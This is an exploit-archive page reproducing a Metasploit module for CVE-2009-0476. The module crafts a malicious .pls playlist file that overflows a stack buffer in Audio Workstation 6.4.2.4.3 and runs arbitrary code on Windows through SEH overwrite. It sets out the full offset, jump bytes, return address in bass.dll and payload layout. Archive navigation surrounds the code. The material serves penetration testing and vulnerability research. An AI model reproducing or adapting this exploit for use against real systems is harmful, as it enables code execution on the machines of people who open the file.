Audio Workstation 6.4.2.4.3 pls Buffer Overflow

Audio Workstation 6.4.2.4.3 pls Buffer Overflow: Posted Dec 31, 2009; Authored by germaya_x, dookie | Site metasploit.com; This Metasploit module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.; tags | exploit, remote, overflow, arbitrary; advisories | CVE-2009-0476; SHA-256 | d9f34d3ca724495af9e1703e2053bf024bceb6935e3dacafc2b68f298b46fb9a; Download | Favorite | View

Audio Workstation 6.4.2.4.3 pls Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
          When opening a malicious pls file with the Audio Workstation, 
          a remote attacker could overflow a buffer and execute 
          arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'germaya_x', 'dookie', ],
      'Version'        => '$Revision: 7828 $',
      'References'     =>
        [
          [ 'CVE', '2009-0476' ],
          [ 'OSVDB', '55424' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },          
      'Payload'        =>
        {
          'Space'    => 4100,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'   =>  'True',
        },
      'Platform' => 'win',
      'Targets'        => 
        [
          [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 08 2009',
      'DefaultTarget'  => 0))
     
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
      ], self.class)

  end

  def exploit

    sploit = rand_text_alpha_upper(1308)
    sploit << "\xeb\x16\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << make_nops(32)
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(4652 - payload.encoded.length)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)

  end

end

Top Authors In Last 30 Days

Red Hat 166 files
Ubuntu 102 files
indoushka 75 files
Debian 23 files
nu11secur1ty 20 files
CraCkEr 8 files
Google Security Research 7 files
Gentoo 7 files
Apple 6 files
bluedragonsec 4 files

File Archives

Systems

AIX (428)
Apple (2,009)
BSD (374)
CentOS (57)
Cisco (1,925)
Debian (6,842)
Fedora (1,692)
FreeBSD (1,245)
Gentoo (4,329)
HPUX (879)
iOS (353)
iPhone (108)
IRIX (220)
Juniper (68)
Linux (46,811)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,916)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,938)
UNIX (9,313)
UnixWare (186)
Windows (6,588)
Other

Audio Workstation 6.4.2.4.3 pls Buffer Overflow

Audio Workstation 6.4.2.4.3 pls Buffer Overflow

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Audio Workstation 6.4.2.4.3 pls Buffer Overflow

Share This

Audio Workstation 6.4.2.4.3 pls Buffer Overflow

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems